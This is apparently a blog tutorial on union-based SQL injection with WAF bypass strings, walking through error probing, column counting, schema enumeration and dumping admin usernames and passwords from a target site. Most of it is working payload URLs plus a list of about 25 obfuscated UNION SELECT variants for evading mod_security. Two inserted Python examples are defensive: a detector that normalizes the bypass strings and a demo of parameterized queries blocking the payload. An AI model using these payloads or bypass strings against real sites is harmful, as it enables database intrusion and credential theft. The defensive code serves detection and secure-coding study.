
SQL injection + WAF Bypassing

   Union Based SQL Injection (WAF Bypassing)




Tutorials on the basics of SQL injection:
   SQL Injection - Basics of SQLi Part 1
   SQL Injection - Basics of SQLi Part 2




Union based SQL injection + WAF Bypassing By PRESSI



Today I'm going to discuss union-based SQL injection and WAF bypassing techniques.
Let's start injecting.

Here is our target:

http://www.targetsite.com/news.php?id=11
Add a single quote (') at the end of the URL:

http://www.targetsite.com/news.php?id=11' 




We get a MySQL error, which tells us the quote broke the query.
Let's balance the query so we can keep injecting.
These are the comment styles covered in the previous tutorials; each one cuts off the rest of the original query:

http://www.targetsite.com/news.php?id=11--
http://www.targetsite.com/news.php?id=11--+
http://www.targetsite.com/news.php?id=11-- -
http://www.targetsite.com/news.php?id=11%23
http://www.targetsite.com/news.php?id=11;


Here is a short explanation of balancing and comments in our injection.

After balancing the query, the next step is to count the total number of columns with ORDER BY, increasing the number until the database complains:
http://www.targetsite.com/news.php?id=11 order by 1--+
No error!
http://www.targetsite.com/news.php?id=11 order by 3--+
No error!
http://www.targetsite.com/news.php?id=11 order by 5--+
Again no error!
http://www.targetsite.com/news.php?id=11 order by 6--+
Here we get an error:
Unknown column '6' in 'order clause'
So the query has 5 columns.

Now let's find the vulnerable (displayed) columns:

http://www.targetsite.com/news.php?id=-11 Union Select 1,2,3,4,5--+

If the target site is protected by a WAF, the WAF will block this query and show a mod_security error.

So here are some WAF bypassing methods. They all rely on the same idea: obfuscate the UNION and SELECT keywords (URL encoding, MySQL /*!version*/ comments, inline comments, unusual whitespace, case mixing) so the WAF's signature does not match while MySQL still parses the statement.
   /*!%55NiOn*/ /*!%53eLEct*/
   %55nion(%53elect 1,2,3)-- -
   +union+distinct+select+
   +union+distinctROW+select+
   /**//*!12345UNION SELECT*//**/
   /**//*!50000UNION SELECT*//**/
   /**/UNION/**//*!50000SELECT*//**/
   /*!50000UniON SeLeCt*/
   union /*!50000%53elect*/
   +#uNiOn+#sEleCt
   +#1q%0AuNiOn all#qa%0A#%0AsEleCt
   /*!u%6eion*/ /*!se%6cect*/
   +un/**/ion+se/**/lect
   uni%0bon+se%0blect
   %2f**%2funion%2f**%2fselect
   union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
   REVERSE(noinu)+REVERSE(tceles)
   /*--*/union/*--*/select/*--*/
   union (/*!/**/ SeleCT */ 1,2,3)
   /*!union*/+/*!select*/
   union+/*!select*/
   /**/union/**/select/**/
   /**/uNIon/**/sEleCt/**/
   /**//*!union*//**//*!select*//**/
   /*!uNIOn*/ /*!SelECt*/
Just replace "Union Select" in the URL with one of the bypass strings above.
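From the defender's side, the bypass list above is mostly useful as a specification of what a log review or WAF rule has to undo before matching. The following Python normalizer is an added example, not code from the original post: it strips the encoding and comment layers those strings rely on and then looks for the bare UNION ... SELECT sequence. The sample request paths are constructed for the example; the signature is deliberately coarse and does not cover the REVERSE() or %0b tricks.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample request paths (not taken from any real log): the first five use
# obfuscation patterns from the bypass list, the last two are benign traffic.
SAMPLE_REQUESTS = [
    "/news.php?id=-11%20/*!%55NiOn*/%20/*!%53eLEct*/%201,2,3,4,5--+",
    "/news.php?id=-11%20%55nion(%53elect%201,2,3)--%20-",
    "/news.php?id=-11/**/uNIon/**/sEleCt/**/1,2,3,4,5--+",
    "/news.php?id=-11%20/*!50000UniON%20SeLeCt*/%201,2,3,4,5--+",
    "/news.php?id=-11+%231q%0AuNiOn%20all%23qa%0A%23%0AsEleCt%201,2,3,4,5--+",
    "/news.php?id=11",
    "/search.php?q=reunion+selection+tips",
]

def normalize(raw: str) -> str:
    """Peel off the layers the bypass strings rely on so the keywords are visible:
    URL encoding (decoded twice to cover double-encoded payloads), MySQL
    /*!50000 ... */ version comments (contents kept, because MySQL executes them),
    ordinary /* ... */ comments (dropped), # comments up to the next newline,
    and runs of whitespace including the %0A / %0B tricks. Result is lowercase."""
    s = unquote_plus(unquote_plus(raw))
    s = re.sub(r"/\*!\d*(.*?)\*/", r" \1 ", s, flags=re.S)
    s = re.sub(r"/\*.*?\*/", " ", s, flags=re.S)
    s = re.sub(r"#[^\n]*", " ", s)
    s = re.sub(r"[\s\x00]+", " ", s)
    return s.lower().strip()

# UNION [ALL|DISTINCT|DISTINCTROW] SELECT, with or without an opening parenthesis
UNION_SELECT = re.compile(r"\bunion\s*(?:(?:all|distinct|distinctrow)\s+)?\(?\s*select\b")

def is_union_injection(raw: str) -> bool:
    """True when the normalized request contains a UNION ... SELECT sequence."""
    return UNION_SELECT.search(normalize(raw)) is not None

def scan(requests):
    """Return the subset of request paths flagged as UNION-based injection attempts."""
    return [r for r in requests if is_union_injection(r)]

if __name__ == "__main__":
    for r in scan(SAMPLE_REQUESTS):
        print("flagged:", r, "->", normalize(r))
```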

Let's continue the tutorial.
Now check the vulnerable columns. We use a minus sign (-) in front of the id so the original row matches nothing and the UNION row is displayed instead.

We can also check the vulnerable columns with other methods instead of just using (-); anything that makes the first SELECT return no rows works.

Here are some methods for checking the vulnerable columns, with examples.
Using and 0
http://www.targetsite.com/news.php?id=11 and 0 Union Select 1,2,3,4,5--+

Using and false
http://www.targetsite.com/news.php?id=11 and false Union Select 1,2,3,4,5--+

Using div 0
http://www.targetsite.com/news.php?id=11 Div 0 Union Select 1,2,3,4,5--+

Using null
http://www.targetsite.com/news.php?id=null Union Select 1,2,3,4,5--+

Using .1337
http://www.targetsite.com/news.php?id=11.1337 Union Select 1,2,3,4,5--+

Using minus (-)
http://www.targetsite.com/news.php?id=-11 Union Select 1,2,3,4,5--+

The vulnerable columns are printed on the page; 3 is our vulnerable column.



Here are some MySQL variables and functions that are handy to put in the vulnerable column:

@@version         = current version
@@GLOBAL.VERSION  = current version
user()            = current user
database()        = current database

http://www.targetsite.com/news.php?id=-11 Union Select 1,2,@@version,4,5--+

We can see the current version printed on the page.

The next step is to get the tables:
http://www.targetsite.com/news.php?id=-11 Union Select 1,2,concat(table_name),4,5 from information_schema.tables where table_schema=database()--+

We can see all the tables in the current database.
Now, if you want the admin details of the target site, note the name of the admin table.
Then encode the admin table name with MySQL CHAR() to get the columns of that table: change table_name to column_name, information_schema.tables to information_schema.columns, and table_schema to table_name, and replace database() with the CHAR() value of the admin table name (CHAR(97, 100, 109, 105, 110) is 'admin'):

http://www.targetsite.com/news.php?id=-11 Union Select 1,2,concat(column_name),4,5 from information_schema.columns where table_name=CHAR(97, 100, 109, 105, 110)--+

We can see the column names on the page, e.g. id, username, pass.
To get the data from those columns, here is our final query:

http://www.targetsite.com/news.php?id=-11 Union Select 1,2,concat(username,0x3a,password),4,5 from admin--+
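The whole chain above only works because news.php pastes the id parameter into the SQL text. The following Python/SQLite example is added here and is not the target site's code: it models news.php with a constructed 5-column news table and an admin table, runs the tutorial's final payload through a concatenated query and through a bound parameter, and shows that the bound version never treats the payload as SQL. SQLite's || stands in for MySQL's concat().

```python
import sqlite3

# Constructed in-memory stand-in for the target: a 5-column news table (matching the
# "order by 5" result above) and an admin table. Sample rows only, not real data.
def build_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE news(id INTEGER, title TEXT, body TEXT, author TEXT, posted TEXT);
        INSERT INTO news VALUES (11, 'Hello', 'First post', 'editor', '2015-01-01');
        CREATE TABLE admin(id INTEGER, username TEXT, password TEXT);
        INSERT INTO admin VALUES (1, 'admin', 'example-hash');
    """)
    return conn

def news_vulnerable(conn, id_param: str):
    """String concatenation, the pattern news.php?id= relies on: whatever the client
    sends becomes part of the SQL text, so a UNION rides along with the query."""
    sql = "SELECT * FROM news WHERE id=" + id_param
    return conn.execute(sql).fetchall()

def news_parameterized(conn, id_param: str):
    """Bound parameter: the value is compared as data and never parsed as SQL.
    A non-numeric id simply matches no row."""
    return conn.execute("SELECT * FROM news WHERE id=?", (id_param,)).fetchall()

# The tutorial's final payload after URL decoding ("--+" becomes "-- ").
# SQLite uses || where MySQL uses concat(); that is the only change.
PAYLOAD = "-11 UNION SELECT 1,2,username||':'||password,4,5 FROM admin-- "

if __name__ == "__main__":
    conn = build_db()
    print(news_vulnerable(conn, PAYLOAD))      # third column carries admin:example-hash
    print(news_parameterized(conn, PAYLOAD))   # []
    print(news_parameterized(conn, "11"))      # the legitimate news row
```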



Comments

  1. Please, can you add some screenshots of these WAF bypassing methods? Do you recommend any tools to perform these injections, which I think might be easier, and a direct link to download the tools? Please kindly advise. Also, what do you mean by union select? Thank you.
